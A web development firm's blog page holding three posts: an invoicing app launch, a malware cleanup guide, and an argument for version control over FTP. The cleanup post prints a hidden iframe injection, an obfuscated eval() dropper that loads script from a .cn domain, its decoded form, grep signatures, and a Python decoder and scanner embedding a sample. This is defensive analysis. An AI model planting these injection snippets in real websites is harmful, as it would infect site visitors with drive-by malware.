01 Dec

Invoice Dude – Free Online Invoicing for Small Businesses

Latest News, Our Apps

On Nov. 23, we launched our free online invoicing application, Invoice Dude, and I finally have the time to write about it. Invoice Dude is a free invoicing application that helps you bill your clients with ease, without spending any money or paying any kind of leasing fee. As we are mostly into custom web development for clients, we had had the idea for almost a year, but it was only a few weeks ago that our team finally committed to this project.

Invoice Dude is currently in a private beta phase (which means accounts are limited). Once we get out of it, we are going to launch some add-ons. The add-on list is not yet decided, so we invite the community once again to take part and vote for the most needed add-ons.

We plan to launch similar projects in the near future and look forward to the community's feedback. If you have any suggestions regarding the software, please tell us.

25 May

Reverse Engineering & removing new enhanced HTML Iframe Injection attack

Latest Developments

I’ve spent many hours fixing this ongoing iframe injection trend lately, and I’ve noticed one thing: every time our team fixes it up, it comes back in a new, enhanced form which is more difficult to delete automatically. The first time, it began with:

<iframe src="http://goooogleadsence.biz/?click=8F9DA" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

echo "<iframe src=\"http://goooogleadsence.biz/?click=8F9DA\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

After that, the code got more sophisticated and less readable. The final version looks like this (the string was originally a single line; it is shown joined back together here):

<!--
(function(KWaP){var hSgtJ=':76a:72:20a:3d:22ScriptEngine:22:2c:62:3d:22:56:65rs:69on()+:22:2cj:3d:22:22:2cu:3dn:61vigato:72:2eus:65:72:41gent:3bif((u:2einde:78Of(:22Chrom:65:22):3c0:29:26:26(u:2e:69nd:65:78Of(:22Win:22):3e0):26:26(:75:2eindex:4ff(:22:4eT:206:22):3c0):26:26(d:6f:63um:65nt:2ecookie:2ei:6edex:4ff(:22miek:3d1:22):3c0):26:26:28:74y:70e:6f:66(:7arvz:74s:29:21:3dtyp:65:6ff:28:22A:22))):7bz:72:76zt:73:3d:22A:22:3be:76al(:22if(:77indow:2e:22+:61+:22)j:3dj+:22+:61+:22:4dajo:72:22+b+:61+:22Mi:6eo:72:22+b:2ba+:22B:75ild:22+:62+:22j:3b:22):3bdocument:2ewrite(:22:3c:73:63r:69:70:74:20src:3d:2f:2fma:22:2b:22rt:75z:2e:63n:2f:76i:64:2f:3f:69d:3d:22+j+:22:3e:3c:5c:2f:73cript:3e:22):3b:7d';
eval(unescape(hSgtJ.replace(KWaP,'%')))})(/\:/g);
-->

Let’s reverse engineer it for fun. See that little evil eval()? Replace it with alert(), or with any other logging function such as console.log() in Firebug. The unescape() call only turns the colon-separated hex back into a string; it is the eval() that would execute it, so swapping eval() out lets us read the payload without running it. That gives us:

<!--
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//ma"+"rtuz.cn/vid/?id="+j+"><\/script>");}
-->

That *.cn domain is back again. Note that the script only fires on Windows browsers other than Chrome and Vista/7 ("NT 6"), sets a cookie marker (miek=1) so it runs once, and uses the ScriptEngine version of the browser as the id in the injected script URL. To find this new injection, the common pattern to search for is:

3bdocument:2ewrite(:

Some other patterns you might want to check:

document.write('<iframe

www.zj5173.com

How to clean your website?

Use the grep command, or an equivalent tool for Windows such as PowerGrep, to search every file on the site for the patterns above. Another option for advanced users, which avoids having to hunt for these injections at all, is to keep the site under version control and deploy it as a checked-out working copy. The advantage of this method is that a single "svn status" command lists every file that was modified or added on the server, which is exactly the list you need to clean.
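As an added example (not code from the original post), here is the decode step from the reverse-engineering section done without eval(), plus the grep-style scan from the cleanup section. The dropper's unescape(s.replace(/\:/g,'%')) is plain %XX URL decoding, so urllib reproduces it; the function names (decode_colon_hex, join_concats, decode_literals, scan) and the sample file content are my own, with the sample payload shortened from the one shown above.

```python
import re
from urllib.parse import unquote

# Signatures quoted in the post, matched as plain substrings.
SIGNATURES = ("3bdocument:2ewrite(", "document.write('<iframe",
              "www.zj5173.com", "goooogleadsence.biz")

# Single-quoted JS string literal containing at least one ':XX' escape.
COLON_HEX_LITERAL = re.compile(r"'([^'\n]*:[0-9a-fA-F]{2}[^'\n]*)'")

def decode_colon_hex(blob: str) -> str:
    """Mirror the dropper's own decode step without eval(): it runs
    unescape(s.replace(/\\:/g, '%')), which is plain %XX URL-decoding."""
    return unquote(blob.replace(":", "%"))

def join_concats(js: str) -> str:
    """Collapse "a"+"b" into "ab" so a hostname split across literals
    (//ma"+"rtuz.cn in the post's sample) becomes greppable."""
    return re.sub(r'"\s*\+\s*"', "", js)

def decode_literals(text: str) -> list[str]:
    """Decode every colon-hex literal found in a file's text."""
    return [join_concats(decode_colon_hex(m.group(1)))
            for m in COLON_HEX_LITERAL.finditer(text)]

def scan(text: str) -> list[tuple[int, str]]:
    """Return (line_number, signature) for each signature hit in text."""
    return [(n, sig) for n, line in enumerate(text.splitlines(), 1)
            for sig in SIGNATURES if sig in line]

# Constructed sample: the post's obfuscated dropper, shortened to the variable
# setup plus the document.write() tail (the fingerprinting checks removed).
SAMPLE_PHP = r"""<?php
include 'header.php';
?>
<!--
(function(KWaP){var hSgtJ=':76a:72:20a:3d:22ScriptEngine:22:2c:62:3d:22:56:65rs:69on()+:22:2cj:3d:22:22:2cu:3dn:61vigato:72:2eus:65:72:41gent:3bdocument:2ewrite(:22:3c:73:63r:69:70:74:20src:3d:2f:2fma:22:2b:22rt:75z:2e:63n:2f:76i:64:2f:3f:69d:3d:22+j+:22:3e:3c:5c:2f:73cript:3e:22):3b';eval(unescape(hSgtJ.replace(KWaP,'%')))})(/\:/g);
-->
"""

if __name__ == "__main__":
    for lineno, sig in scan(SAMPLE_PHP):
        print(f"line {lineno}: matched {sig!r}")
    for decoded in decode_literals(SAMPLE_PHP):
        print("decoded:", decoded)
```

Grepping the raw file for the *.cn hostname finds nothing, because the dropper splits it across two literals and only the browser joins them; decoding first and then collapsing the concatenation is what makes the domain visible.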


You can also contact us directly if you need assistance with this. We’ve helped secure over 50 websites in the last 3 months.

29 Apr

Client’s Policies or Your productivity? / Version control over FTP

Best Practices

Not too long ago, my colleague asked the community how they handle deployments and patches to the production server. We received quality responses and various options, and I learned many new things about how others handle it. We have been using Subversion to version our projects for the last 3 years and were very happy to adopt it. It cut a lot of time out of the release cycle, and all the hassle one used to go through was simply gone.

But here comes the problem: clients who are not willing to use such tools, who simply do not give you the authorization to do so, or who are on a shared hosting environment. I’ve seen this problem with 5 out of 10 of my clients. They have a reason to stop you: their previous development companies never asked for this. Then there are clients who say “Use FTP” when you ask them for SSH access, which limits the productivity of the whole system and the project. However, I consider it my job to make them aware of the things that can help them, and that is why I’m writing this post today.

So in this post, I want to highlight the advantages any version control system offers over plain FTP transfer for deployment. I’m sure this will help buyers who don’t allow much control in the hands of their web developers. Ok, here we go; these are some real BIG limitations you will face using FTP:

  1. The initial setup is always easy, but updating, bug fixing and applying patches is difficult over FTP. You spend 10x more time being careful about things that could be handled automatically.
  2. You have to wait for the files to upload/download.
  3. If something goes wrong, it’s really difficult to revert to the “last stable” state.

When you’re using Subversion, or any other version control tool for that matter, none of these issues are your concern any more, and you can focus on real development rather than hunting for files. Here are some advantages offered by a standard version control system:

  1. To apply patches, you simply issue the “svn up” command (in the case of Subversion). It automatically updates the modified files.
  2. If something is wrong, you can go back to any old revision and have your site running as it was. Using Subversion’s advanced features and proper versioning, you can also define a “last stable” version and be safe at all times.
  3. You don’t have to worry about the latest backup: everything is on a separate server, with all revisions.

This is just a start; many more things are taken care of once you use version control. There are also other automated approaches: some people like using “rsync”, others rely on application servers, and so on.

I’m hoping this will help buyers understand our offering better. Thanks for reading.

Abhimanyu Grover
